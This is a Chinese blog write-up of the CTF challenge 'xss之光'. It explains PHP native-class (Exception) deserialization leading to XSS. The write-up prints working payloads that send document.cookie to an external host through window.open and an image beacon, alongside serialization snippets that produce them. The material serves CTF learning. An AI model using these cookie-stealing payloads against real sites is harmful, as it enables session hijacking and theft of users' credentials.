[BJDCTF 2nd]xss之光

最新推荐文章于 2022-05-10 15:29:29 发布
最新推荐文章于 2022-05-10 15:29:29 发布
阅读量112 收藏
点赞数
分类专栏: BUUCTF web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53314778/article/details/113827803
版权
web 同时被 2 个专栏收录
52 篇文章 0 订阅
订阅专栏
BUUCTF
46 篇文章 0 订阅
订阅专栏

知识点:

  • PHP中利用原生类的反序列化以实现XSS

启动:
在这里插入图片描述
git源码泄露
用githack提取源码:

<?php
$a = $_GET['yds_is_so_beautiful'];
echo unserialize($a);

反序列化前面有echo 考虑调用 __toString()方法。

但是不知道类。上网搜资料后发现,php自身带着许多原生类。

其中有用的包括:

  1. 调用__call()方法的时候
    有SoapClient 类 ,
    可用于php5、php7,
    可以形成SSRF漏洞。

  2. 调用__toString()方法的时候
    有Error类和Exception类两个异常类
    Error仅可用在php7,Exception可用在php5、php7
    可以形成xss漏洞

php 的原生类中的Error 和Exception 中内置了toString 方法, 可能造成xss漏洞。
可以利用

<?php
$a = new Exception("<script>alert(1)</script>");
echo urlencode(serialize($a));
?>

成功回显在这里插入图片描述

也是成功弹窗了,但是怎么弄到flag还是很迷。使用alert(document.cookie)发现为空.
去查了一下,当时的比赛给了个hint:

[hint for xss之光] 哥,你就把cookie打出去,就有惊喜

说明通过跳转把cookie打出去。。其实我自己也还是不太懂,因为javascript没学过。。。。看了一下大师傅们的姿势:

可能开启了httponly
使用带参数打开新窗口的方法获得cookie得到flag
或者在请求头中可以找到

<script>window.open('http://a0a58185-02d8-4b85-8dbb-f5a991c8b45c.node3.buuoj.cn/?'+document.cookie);</script>
或者
<script>window.location.href='baidu.com'</script>



<?php
$a = new Exception("<script>window.open('http://a0a58185-02d8-4b85-8dbb-f5a991c8b45c.node3.buuoj.cn/?'+document.cookie);</script>");
echo urlencode(serialize($a));
?>

在这里插入图片描述
还有的大师傅没有利用PHP的原生类,直接打cookie也可以:

<?php
$s = '<script>var img=document.createElement("img");img.src="http://f7ffa642-8f7f-4879-bc49-e75d26e7c2bc.node3.buuoj.cn/a?"+escape(document.cookie);</script>';
echo serialize($s);

最后还有的师傅提到了httponly的问题。既然让我们把cookie打出去,说明flag是在cookie里的,但是直接查却查不到:在这里插入图片描述

  • 如果cookie中设置了HttpOnly属性,那么通过js脚本将无法读取到cookie信息,这样能有效的防止XSS攻击,窃取cookie内容,这样就增加了cookie的安全性,即便是这样,也不要将重要信息存入cookie。

也提到了万一有的出题人忘记了设httponly这件事的话,XSS这样的题目可以控制台直接出cookie,不过这种情况几乎不可能出现。

参考文献:反序列化之PHP原生类的利用

无尽星河-深空
关注
专栏目录
前端安全之XSS攻击
02-25
有人将XSS攻击分为三种,分别是:1.ReflectedXSS(基于反射的XSS攻击)2.StoredXSS(基于存储的XSS攻击)3.DOM-basedorlocalXSS(基于DOM或本地的XSS攻击)基于反射的XSS攻击,主要依靠站点服务端返回脚本,在客户端...
[BJDCTF 2nd]xss之光 (利用php原生类进行XSS
EC_Carrot的博客
12-29 544
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 知识点 有关该题目的知识点,十分建议去看看这篇大佬的文章:https://blog.csdn.net/qq_45521281/article/details/105812056 当对象被当作一个字符串使用时候调用(不仅仅是echo的时候,比如file_exists()判断也会触发):__toString 这里的原理就是利用__toString这个魔法方法
[BJDCTF 2nd]xss之光 -wp
freerats的博客
08-04 501
打开容器就gungungun,其他啥也没有。 扫目录扫出git泄露 <?php $a = $_GET['yds_is_so_beautiful']; echo unserialize($a); 源码就这么短短三行。 一开始还想着是不是其他地方还会泄露另一部分源码,但是没找到。 参考其他wp才知道是利用php的原生类进行XSS 题目给的提示就是题目叫xss,说明需要xss。 echo unserialize($a); 可触发序列化中的魔术方法__toString Error 适用于php7版本 E
利用php的原生类进行XSS([BJDCTF 2nd]xss之光
qq_45521281的博客
04-28 1628
文章目录基础知识__toString 文章围绕着一个问题,如果在代码审计中有反序列化点,但是在原本的代码中找不到pop链该如何?N1CTF有一个无pop链的反序列化的题目,其中就是找到php内置类来进行反序列化。 基础知识 首先还是来回顾一下序列化中的魔术方法,下面也将以此进行研究。 当对象被创建的时候调用:__construct 当对象被销毁的时候调用:__destruct 当对象被当作一个字符...
web安全之XSS攻击demo
04-18
本篇将深入探讨XSS攻击的概念、类型、危害以及防范措施,并结合提供的"web安全之XSS攻击demo"进行详细讲解。 XSS攻击是通过注入恶意脚本到Web页面中,使得当其他用户浏览这些页面时,脚本被执行,从而可以盗取用户...
2020/7/20 -[BJDCTF 2nd]xss之光 - git源码泄露、php原生类反序列化
抒情诗
07-20 597
又回来了,当初看不懂,现在看起来也很nb(Exception类没了解过) 首先是个git源码泄露,开始用dirsearch扫的时候很快,但全是429,后来用了-s 延迟(单位:s)选项成功扫出.git泄露。 亲自实验-s 0.5也可以,稍微快了点。用githack下载源码,index.php 内容如下所示 <?php $a = $_GET['yds_is_so_beautiful']; echo unserialize($a); 说他是反序列化吧,我没见过这种形式的,也不太清楚;说他不是反序列化
---------已搬运-------BUUCTF:[BJDCTF 2nd]xss之光 ------------ 反序列PHP原生类的应用 -----------git小操作
Zero_Adam的博客
02-25 277
目录:一、自己做:二、不足&&收获三、学习WP 一、自己做: 就到源码泄露那里,而且我自己也不会git操作。。。 -<?php -$a = $_GET['yds_is_so_beautiful']; -echo unserialize($a); 二、不足&&收获 进一步晓得了 PHP 反序列化中的原生类的应用 alert(1)不行的时候,多试试别的。什么弹cookie 啊。跳转网页啊。都试试 三、学习WP 没有类的情况下,可以进行原生类反序列化 参考文献:反序列化
PHP反序列化原生类利用
Sentiment的博客
05-10 1790
前言 之前对反序列化原生类进行过总结,但可能总结的方面不同,在ctf用到的很少,所以这里在对ctf常用原生类进行一次总结。 原生类 php中内置很多原生的类,在CTF中常以echo new $a($b);这种形式出现,当看到这种关键字眼时,就要考虑本题是不是需要原生类利用了。 先看下都有什么内置原生类 <?php $classes = get_declared_classes(); foreach ($classes as $class) { $methods = get_class_meth
XSS绕过总结
热门推荐
qq_42990434的博客
05-29 1万+
有时候明明有一个xss漏洞,但是却有xss过滤规则或者WAF保护导致我们不能成功的利用,这些会屏蔽掉我们的代码,会导致我们执行完代码之后什么反应都没有,这时候我们可以审查一下元素,看看我们的代码有没有替换为空,或者替换成其他东西,或者那些符号被过滤掉了。 比如:我们输入<script> alert(“hi”) </scrip>, 会被转换成<script> alert(>xss detected<) </scrip>,这样的话我们的js语句就不生效
【应用安全之XSS一】XSS攻击测试以及防御
qq_35789269的博客
02-19 6550
跨站脚本攻击 跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script(php,js等)代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的特殊目的。 攻击实例 下面为一个Input标签: <input type="text" value="value"></input> 当用输入值
XSS多姿势执行alert
balance的博客
10-15 6502
以下归纳了多种执行alert函数的方式(前提是获得js执行上下文) ,可用于xss filter bypass 1、常规alert &lt;a href="javascript:alert()"&gt;XSS Test&lt;/a&gt; 2、字符串操作 Unicode字符以"\u"开头,例如\u00A9。Unicode码位用"\u{}"表示,例如\u{2F804} 十六进制以"\x"开头,
【奇淫巧技】XSS绕过技巧
weixin_30578677的博客
06-07 1459
XSS记录   1、首先是弹窗函数: alert(1) prompt(1) confirm(1)eval()   2、然后是字符的编码和浏览器的解析机制:     要讲编码绕过,首先我们要理解浏览器的解析过程,浏览器在解析HTML文档时无论按照什么顺序,主要有三个过程:HTML解析、JS解析和URL解析,每个解析器负责HTML文档中各自对应部分的解析工作。     首先浏览器...
反序列化漏洞中的原生类利用
m0_46607055的博客
11-16 3924
前言 ctf中代码审计反序列化的题目中,有时候给出的类没有可以利用的函数(类似eval) 这个时候该尝试调用php自带的原生类。 关于原生类有哪些,分别对应什么功能,可以看这个视频。 第二期培训:php原生类_哔哩哔哩_bilibili 例题 下面是一道反序列化的题目 <?php error_reporting(0); class catalogue{ public $class; public $data; public function __constru
xss漏洞后端解决(body参数校验)
lqlscn的博客
09-08 1637
xss漏洞 我看网上有了很多的解释了 ,公司现在要过等保三级,然后发现一堆问题 要求修改。感觉没啥好说的 还是直接上代码吧。 import java.io.IOException; import java.util.Map; import java.util.Set; import java.util.regex.Matcher; import java.util.regex.Pattern; import javax.servlet.Filter; import javax.servlet.Filt
揭示Web安全挑战:XSS攻击原理与防范策略
Web安全性测试之XSS(Cross-Site Scripting)是一项至关重要的任务,特别是在现代Web应用中。XSS漏洞是一种常见的Web安全威胁,攻击者通过在网页中嵌入恶意客户端脚本,如JavaScript,利用用户浏览器的执行能力来...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值